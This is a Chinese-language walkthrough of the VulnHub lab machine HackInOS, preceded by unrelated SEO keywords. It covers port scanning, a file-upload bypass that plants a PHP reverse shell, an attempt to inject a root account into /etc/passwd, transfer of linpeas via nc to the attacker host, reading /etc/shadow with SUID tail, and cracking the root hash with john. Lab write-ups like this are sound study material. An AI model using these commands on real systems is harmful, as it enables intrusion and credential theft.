公司企业网站制作教程,wordpress代替系统,现在注册公司好注册吗,风溪商城是那个网站建设的文章目录 1. 主机发现2. 端口扫描3. 服务枚举4. 服务探查5. 提权5.1 枚举系统信息5.2 探索一下passwd5.3 枚举可执行文件5.4 查看capabilities位5.5 目录探索5.6 枚举定时任务5.7 Linpeas提权 靶机地址#xff1a;https://download.vulnhub.com/hackinos/HackInOS.ova
1. 主机… 文章目录 1. 主机发现2. 端口扫描3. 服务枚举4. 服务探查5. 提权5.1 枚举系统信息5.2 探索一下passwd5.3 枚举可执行文件5.4 查看capabilities位5.5 目录探索5.6 枚举定时任务5.7 Linpeas提权 靶机地址https://download.vulnhub.com/hackinos/HackInOS.ova
1. 主机发现
目前只知道目标靶机在192.168.232.xx网段通过如下的命令看看这个网段上在线的主机。
$ nmap -sP 192.168.232.0/24锁定目标靶机IP为192.168.232.145。
2. 端口扫描
通过下面的命令进行端口扫描。
$ sudo nmap -p 1-65535 192.168.232.145暴露的端口不多看来只能先从8000端口下手了。
3. 服务枚举
通过下面的命令进行服务枚举。
$ sudo nmap -p22,8000 -A -sT -sV 192.168.232.1454. 服务探查
先通过浏览器访问一下8000端口看一下。 貌似是一个基于WoePress的Blog站点不过比较有意思的是所有的超链接都指向了localhost就算我在kali上将localhost指向了靶机还是无法访问但是手工在浏览器里面将localhost修改成靶机IP地址就可以访问。就算修改了/etc/hosts也不会生效不过手工ping这个localhost是可以跳转到我们的靶机地址的。 先用wpscan扫描一下再说吧。
$ wpscan --url http://192.168.232.145:8000/扫出了一点东西但是感觉价值没有那么高先看看对应的robots文件。 进去看看。 upload.php页面可以上传突破文件不过uploads目录不允许访问估计是做了限制不过这里应该是显示上传的文件的列表试了一下确实可以上传成功不过这里看不到。枚举一下目录吧。
$ dirsearch -u http://192.168.232.145:8000/没有太特殊的内容发现再用dirb挂载big字典看看。
$ dirb http://192.168.232.145:8000/ /usr/share/wordlists/dirb/big.txt -X .php跟之前的扫描没啥区别唯一多出来的一个/wp-trackback.php里面也没有什么特殊内容如下图。 果断放弃了还是看看apache和wordpress有没有可用的EXP吧遗憾的是也没有找到合适的。 回顾前面的操作貌似大概率可能突破边界的地方还是上传文件的地方回过头去再看看。 这个页面实在是简单的不能再简单了上传一个图片文件和php脚本分别看看有啥反应。 没有太多的规律性现在的关键是找到上传的内容去了哪里先看看Submit按钮的源代码吧。 也没啥特殊的不过最后的注释行里面有个git上的项目看看这里面是否有我们需要的内容。 尤其是第二个感觉就是这个靶机的一个打靶线索啊竟然有这种好事简直是救命稻草进去看看。 这不是打靶的线索是对于这个靶机的描述还是看看README.md和upload.php两个文件吧。 果真是文件上传的逻辑大致是在元文件名后面添加1~100的随机数然后再计算MD5作为新文件名文件上传到/uploads/目录下如果上传的是图片文件mime类型为image/png或者image/gif返回“file uploaded xxx”如果是其它文件返回“”看来我们之前显示的“”都是因为上传失败了。 知道了这个大致逻辑我们就可以尝试枚举我们上传后的文件的文件名了。思路如下 先构建一个带有反弹shell的php文件文件头添加GIF8以绕过文件类型检查如下图。 然后这个文件名后面添加1~100的数字并计算出MD5作为新的文件名将这些文件名写到一个文件里面作为字典然后用dirb进行爆破应该是可以爆破出上传文件的文件名。 我们的php文件如上图所示然后分别将对应的文件名加上1~100即revers1、revers2、revers3、revers4 …然后将文件名计算MD5后放到文本文件中作为字典用python脚本生成。 生成的字典如上图所示用于生成字典的脚本如下图所示。 接下来我们开始上传带有反弹shell的php脚本revers.php。 根据代码中的逻辑上图所示的信息显示时代表上传成功了然后我们用dirb挂上前面产生的字典枚举一下看看。
$ dirb http://192.168.232.145:8000/uploads/ my_dict.txt好奇怪我上传了N次不应该枚举出来是空的。不知道是不是我本地的revers.php文件和python脚本、my_dict.txt字典不在同一个目录的原因将revers.php文件拷贝到跟my_dict.txt同一个目录下再试一遍顺利被枚举出来了如下图。 接下来在kali上的4444端口上建立监听然后手工访问一下上面的文件试试看。 访问不成功反弹shell也没有建立前面枚举出来的两个文件都是这样的问题。再回过头来看看刚才枚举出来的文件还在不在。 空了可能服务器后台有对上传的文件进行定时清理的机制在我磨蹭的过程中被清理掉了。这次先建立好监听然后快速上传枚举出来以后直接访问一下。 嗯这次建立反弹shell成功了不过浏览器访问上传的文件的时候还是提示not found。
5. 提权
先优化一下shell。
$ whereis python
$ /usr/bin/python3.5 -c import pty;pty.spawn(/bin/bash)这次看上去稍微正常一点了。
5.1 枚举系统信息
$ uname -a
$ cat /etc/*-release是64位的Ubuntu 16.04.1。
5.2 探索一下passwd
$ cat /etc/passwd | grep -v nologin从显示结果来看除了root没有比较正常的用户可以通过shell登录。尝试写入一个用户。
$ openssl passwd test123$ echo testusr:$1$PR0EMvBa$Y6BsWQAQVRKB3ZfEnS1Ow0:0:0:root:/root:/bin/bash /etc/passwd没有权限。
5.3 枚举可执行文件
www-data1afdd1f6b82c:/$ sudo -l无法执行sudo。
www-data1afdd1f6b82c:/home$ find / -user root -perm -4000 2/dev/null貌似没有可以用于提权的可执行文件。
5.4 查看capabilities位
www-data1afdd1f6b82c:/home$ /usr/sbin/getcap -r / 2/dev/null没有合适的capabilities。
5.5 目录探索
先查看一下当前用户的家目录下都有些啥。
www-data1afdd1f6b82c:/home$ cd ~/
www-data1afdd1f6b82c:/home$ ls -lah就是我们前面目录枚举是看到的内容那个神奇的uploads目录也赫然在列也没啥特殊的还得用linpeas搞一下。
5.6 枚举定时任务
www-data1afdd1f6b82c:/tmp$ cat /etc/crontab5.7 Linpeas提权 嗯靶机上竟然不能使用wget看看有没有nc。 nc是可以的通过nc上传linpeas.sh。 Kali主机$ nc -lvnp 9999 linpeas.sh 靶机上$ nc 192.168.232.129 9999 linpeas.sh 顺利传输成功。 运行一下。
www-data1afdd1f6b82c:/home$ chmod ux linpeas.sh
www-data1afdd1f6b82c:/home$ sh linpeas.sh可惜没看到有合适的提权提示只有一个/usr/bin/tail其实前面我们枚举可执行文件的时候就枚举出来了不过不会用。。如下图。 网上搜了半天只找到了一篇文章还不太会用。但是大致意思是通过具备SUID的命令可以临时获得对应文件的属主的权限我们参照这篇文章https://juggernaut-sec.com/suid-sgid-lpe/用/etc/passwd文件试试看。 貌似没有我们想想的那么简单。不过按照上面的说法我们是不是可以用tail想看啥文件就看啥文件我们试试分别用cat和tail获取一下shadow文件的内容试试看。
www-data1afdd1f6b82c:/tmp$ cat /etc/shadow
www-data1afdd1f6b82c:/tmp$ /usr/bin/tail -c1G /etc/shadow确实如上面的猜测cat看不到shadow文件的内容tail是可以的并且在shadow中捞到了root用户的密码信息 6 说明算法用的是 S H A − 512 中间的 6说明算法用的是SHA-512中间的 6说明算法用的是SHA−512中间的qoj6/JJi是盐值再往后才是密文。 手工看看能不能从中解析出真正的密码。 使用hash-identifier没有收获再用john试试看。
$ echo $6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/ root_pass.txt
$ john root_pass.txt难道这个john就算是root的密码了直接切换到root用户试试看吧。 还真是这样子第一次从shadow文件中解析密码又学了一招获取一下flag。 提权成功。
